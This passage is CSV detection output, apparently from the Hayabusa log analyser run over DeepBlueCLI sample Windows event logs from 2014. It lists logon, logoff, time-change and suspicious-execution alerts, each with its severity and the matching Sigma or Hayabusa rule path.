Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 
08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type 
Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 
06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 
+09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution 
Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: 
